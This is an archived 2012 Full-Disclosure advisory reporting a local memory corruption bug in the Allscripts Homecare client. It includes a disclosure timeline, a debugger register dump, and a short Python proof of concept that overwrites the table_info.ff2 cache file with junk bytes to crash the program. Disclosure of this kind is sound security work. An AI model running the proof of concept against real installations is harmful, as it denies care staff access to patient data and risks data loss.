lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 25 Oct 2012 08:33:34 -0400
From: Thomas Richards <g13net@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Allscripts Homecare Client Local Memory
	Corruption table_info.ff2

# Title: Allscripts Homecare Client Local Memory Corruption table_info.ff2
# Date: 10/25/12
# Author: G13
# Software Link:
http://www.allscripts.com/en/solutions/post-acute-solutions/homecare/show/overview.html
# Version: 6.1.0, 7.0.1
# Category: Application (local)
# Tested on: Windows 7 Pro 64 Bit
# dc585

###### Introduction ######

Allscripts Homecare is an industry leading home care system designed
to improve clinical quality of care, financial
performance, and operational control for large, integrated home care
organizations and small home care companies.
Business, clinical, and scheduling functionality for multiple lines of
business—home health, hospice, and private
duty are combined seamlessly in one integrated home care software system.

###### Report Timeline ######

12/22/11 - Discovery
01/12/12 - Vendor Notification
10/25/12 - Disclosure

###### Exploit Technique ######

Local

###### Details ######

A Memory Corruption vulnerability was detected in Allscripts Homecare
6.1.0.  The vulnerability is caused by
processing a corrupt .ff2 file in the program's cache and causing an
access violation.  The specific file is
table_info.ff2.  The cache for this program is where a local copy of
paitent and system data is stored and
accessable by users.  Corrupting this will deny users access to the
program and a possible loss of data.

Other versions are possibly affected.

###### Exception Log ######

EAX 00000000
ECX 00184646
EDX 41414141
EBX 006E994F MHC.006E994F
ESP 0018F244
EBP 0018F284
ESI 006E994F MHC.006E994F
EDI 00000000
EIP 004040AF MHC.004040AF
C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit FFFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_COMMITMENT_LIMIT (000005AF)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty %#.19L
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty %#.19L
               3 2 1 0      E S P U O Z D I
FST 1020  Cond 0 0 0 0  Err 0 0 1 0 0 0 0 0  (GT)
FCW 137F  Prec NEAR,64  Mask    1 1 1 1 1 1


###### PoC ######

#!/usr/bin/python

f = open('c:\program files
(x86)\misys\homecare\client\cache\table_info.ff2','w')
f.write('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
f.close()

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ